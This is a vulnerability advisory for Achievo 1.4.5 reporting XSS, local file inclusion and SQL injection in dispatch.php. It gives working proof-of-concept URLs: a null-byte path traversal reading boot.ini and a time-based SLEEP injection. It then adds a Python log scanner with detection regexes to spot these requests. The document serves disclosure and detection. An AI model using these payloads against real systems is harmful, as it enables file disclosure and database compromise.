Information
--------------------
Advisory by Netsparker (now Invicti)
Name:  XSS, LFI and SQL Injection Vulnerabilities in Achievo
Software:  Achievo 1.4.5 and possibly below.
Vendor Homepage:  http://www.achievo.org
Vulnerability Type:  Cross-Site Scripting, Local File Inclusion and SQL Injection
Severity: Critical
Researcher: Canberk Bolat
Advisory Reference:  NS-12-016

Description
--------------------
Achievo is a flexible web-based resource management tool for business environments. Achievo's resource management capabilities will enable organizations to support their business processes in a simple, but effective manner.

Details
--------------------
Achievo is affected by XSS, LFI, and SQL Injection vulnerabilities in version 1.4.5.

  • XSS: http://example.com/dispatch.php (GET: atklevel, atkaction, atkstackid, atkselector, atkfilter, searchString)
  • LFI: http://example.com/dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3
  • SQL Injection: http://example.com/achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3
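The three request patterns above leave distinctive traces in web server logs, so a defender can retro-hunt for exploitation attempts against dispatch.php even before patching. The following is an added example and not part of the Netsparker/Invicti advisory or of Achievo itself: it assumes a combined-format access log (Apache/nginx style) and applies three heuristics of my own, traversal or a null byte in atknodetype (the LFI case), a SLEEP() call in atkselector (the time-based SQL injection case), and HTML markup in the GET parameters the advisory lists as reflected (the XSS case). The log lines are constructed for the example; two of them carry the advisory's own proof-of-concept URLs.

```python
"""Scan access-log lines for the Achievo 1.4.5 dispatch.php request patterns.

Added example (not code from the advisory or from Achievo). Assumes combined
log format; the detection heuristics are the author's own, not Invicti's.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# GET parameters the advisory names as reflected without encoding (XSS).
REFLECTED_PARAMS = {"atklevel", "atkaction", "atkstackid", "atkselector",
                    "atkfilter", "searchstring"}

TRAVERSAL_RE = re.compile(r"\.\.[/\\]")          # ../ or ..\ after decoding
NULL_BYTE = "\x00"                                # %00 used to truncate ".search"
SLEEP_RE = re.compile(r"\bsleep\s*\(", re.IGNORECASE)
MARKUP_RE = re.compile(r"[<>]")                   # crude: any tag-like character

# Only the request line and status are needed from a combined-format entry.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample log; lines 2 and 3 use the PoC URLs from the advisory.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Nov/2012:10:00:01 +0000] "GET /dispatch.php?atknodetype=project.project&atkaction=admin HTTP/1.1" 200 5120
203.0.113.5 - - [01/Nov/2012:10:00:07 +0000] "GET /dispatch.php?atkaction=search&atknodetype=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00.search&searchstring=3 HTTP/1.1" 200 812
203.0.113.5 - - [01/Nov/2012:10:00:41 +0000] "GET /achievo-1.4.5/dispatch.php?atknodetype=employee.userprefs&atkaction=edit&atkselector=(SELECT%201%20FROM%20(SELECT%20SLEEP(25))A)&atklevel=-1&atkprevlevel=0&=3 HTTP/1.1" 200 2044
203.0.113.5 - - [01/Nov/2012:10:01:02 +0000] "GET /dispatch.php?atkaction=search&atknodetype=project.project&searchString=%3Cb%3Ereport%3C%2Fb%3E HTTP/1.1" 200 3301
203.0.113.5 - - [01/Nov/2012:10:01:09 +0000] "GET /index.php HTTP/1.1" 200 1200
""".splitlines()


def classify_request(target):
    """Return sorted finding labels ('lfi', 'sqli', 'xss') for one request target."""
    parts = urlsplit(target)
    if not parts.path.endswith("/dispatch.php"):
        return []
    # parse_qs percent-decodes once; decode a second time so a double-encoded
    # payload ("%252e%252e%252f") is judged on what PHP would finally see.
    params = parse_qs(parts.query, keep_blank_values=True)
    findings = set()
    for name, values in params.items():
        key = name.lower()
        for value in values:
            value = unquote(value)
            if key == "atknodetype" and (TRAVERSAL_RE.search(value) or NULL_BYTE in value):
                findings.add("lfi")
            if key == "atkselector" and SLEEP_RE.search(value):
                findings.add("sqli")
            if key in REFLECTED_PARAMS and MARKUP_RE.search(value):
                findings.add("xss")
    return sorted(findings)


def scan_log(lines):
    """Return (line_number, http_status, findings) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        findings = classify_request(match.group("target"))
        if findings:
            hits.append((number, int(match.group("status")), findings))
    return hits


if __name__ == "__main__":
    for number, status, findings in scan_log(SAMPLE_LOG):
        print(f"line {number}: status {status}: {', '.join(findings)}")
```

The status code is kept in each hit because it is the cheapest triage signal: a 200 on the LFI or SQL injection line means the application accepted the request, while a 4xx from a web application firewall or the patched version suggests it was blocked. The markup check is deliberately coarse and will flag legitimate search strings containing angle brackets; tune it against your own traffic rather than treating a single hit as confirmed exploitation.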

You can read the full article about the Cross-Site Scripting, LFI and SQL Injection vulnerabilities here:

Advisory Timeline
--------------------
23/01/2011 - First contact
25/02/2012 - Second contact - No response
01/11/2012 - Advisory released

Credits
--------------------
The vulnerabilities were discovered during testing with the Invicti Web Application Security Scanner.

About Invicti
--------------------
Invicti Security is transforming the way web applications are secured. Invicti empowers organizations in every industry to scale their overall security operations, make the best use of their security resources, and engage developers in helping to improve their overall security posture.